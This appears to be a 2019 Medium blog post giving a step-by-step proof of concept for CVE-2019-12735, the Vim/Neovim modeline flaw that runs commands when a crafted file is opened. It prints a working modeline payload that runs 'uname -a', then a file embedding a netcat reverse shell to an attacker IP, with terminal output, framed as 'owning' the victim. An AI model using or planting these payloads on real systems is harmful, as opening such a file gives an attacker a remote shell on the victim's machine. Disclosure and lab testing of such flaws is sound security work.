Exploit PoC: Linux command execution on Vim/Neovim vulnerability (CVE-2019–12735)

Magrabur Sofily
Jun 11, 2019 · 3 min read

Category: Remote Code Execution
Severity: High
Description:
The flaw resides in Linux Vim/Neovim editor in the way how those editors handle the “modelines” a feature that’s enabled by default to automatically find and apply a set of custom preferences as mentioned by the creator of a file at the starting and ending lines in a document. Therefore, just opening an innocent looking specially crafted malicious file using Vim or Neovim editor could allow attackers to execute commands on Linux system and ultimately take over the target system.

Affected Products:
• Vim before version 8.1.1365
• Neovim before version 0.3.6

Here is a step-by-step PoC of exploiting the vulnerability:

PoC Machine: I used my Kali Linux (4.17.8 x86_64) as the target machine for this purpose.
Victim machine IP: 172.31.242.25
Attacking machine IP: 172.31.242.143
PoC Summary:
1. Checked if the modeline option has not been disabled.
2. Quick PoC for command execution on vim editor.
3. Running a shell command for creating a reverse shell to own the target system.

Step-1: My Kali linux kernel details:
root@kali:~# cat /proc/version
Linux version 4.17.0-kali1-amd64 (devel@kali.org) (gcc version 7.3.0 (Debian 7.3.0–25)) #1 SMP Debian 4.17.8–1kali1 (2018–07–24)
root@kali:~#

Image for post
Image for post
Victim Kali machine details

Step-2: Set the modeline in vimrc file. Just add ‘:set modeline’ at the end of the file and save.
root@kali:~# tail -2 /etc/vim/vimrc

:set modeline
root@kali:~#

Image for post
Image for post
vimrc file

Step-3: Create a file cmdtest.txt with for command execution.
root@kali:~# cat cmdtest.txt
:!uname -a||” vi:fen:fdm=expr:fde=assert_fails(“source\!\ \%”):fdl=0:fdt=”
root@kali:~#

Image for post
Image for post
command execution file

Step-4: Now, open the above file using vim editor. It will throw output of ‘uname -a’. Hence, it is vulnerable.
root@kali:~# vim cmdtest.txt
Linux kali 4.17.0-kali1-amd64 #1 SMP Debian 4.17.8–1kali1 (2018–07–24) x86_64 GNU/Linux
Press ENTER or type command to continue

Image for post
Image for post
Successful command execution

Press Enter button, this will take you to Vim editor. Use ‘:q!’ to exit from it.

Step-5: Now comes the real fun part: Creating a reverse shell.
Create a new file or edit cmdtest.txt to overwrite a netcat reverse shell command instead of using the simple uname command.

Step-5.1: At attacker side:
Setting up a netcat listener on attacking machine.

Image for post
Image for post
Attacking machine setup

Step-5.2: At victim side: Prepare and run the exploit
I am creating a new file named ‘revshell.txt’ where I replaced the previous ‘uname -a’ command with a netcat simple reverse shell command.

root@kali:~# cat revshell.txt
:!nc -nv 172.31.242.143 4444 -e /bin/sh ||” vi:fen:fdm=expr:fde=assert_fails(“source\!\ \%”):fdl=0:fdt=”
root@kali:~#

Image for post
Image for post
Run the exploit

Step-5.3: Finally open the revshell.txt file using vim command and look at attacker machine for the reverse shell.

Victim side:
root@kali:~# vim revshell.txt
(UNKNOWN) [172.31.242.143] 4444 (?) open

Image for post
Image for post
Reverse shell created

Attacker side:

Image for post
Image for post
Successfully owned victim machine

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store